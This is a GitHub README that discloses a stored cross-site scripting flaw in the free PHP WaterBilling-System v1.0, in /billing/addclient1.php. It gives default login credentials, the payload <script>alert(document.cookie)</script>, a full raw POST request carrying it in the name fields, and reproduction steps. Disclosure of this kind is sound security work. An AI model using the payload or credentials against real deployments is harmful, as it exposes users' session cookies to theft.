Skip to content

kaikai-11/WaterBilling-System

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

WaterBilling-System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)

Vul_Author: Kai Wang

Login Account:jude Password:123

vendors: https://itsourcecode.com/free-projects/php-project/billing-system-in-php-with-source-code/

Vulnerability File: /billing/addclient1.php

Vulnerability location: /billing/addclient1.php HTTP/1.1

[+] Payload: <script>alert(document.cookie)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

POST /billing/addclient1.php HTTP/1.1
Host: 10.12.180.79
Content-Length: 178
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.12.180.79
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.12.180.79/billing/clients.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
Connection: close

lname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&fname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&mi=M&address=address&contact=test&meterReader=test&add=ADD

When you enter the system,click "add client"

image

input a XSS script in the lastname input boxes,such as "<script>alert(document.cookie)</script>",it will expose cookie.

image

click add,and you will obtain its cookie.

image

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published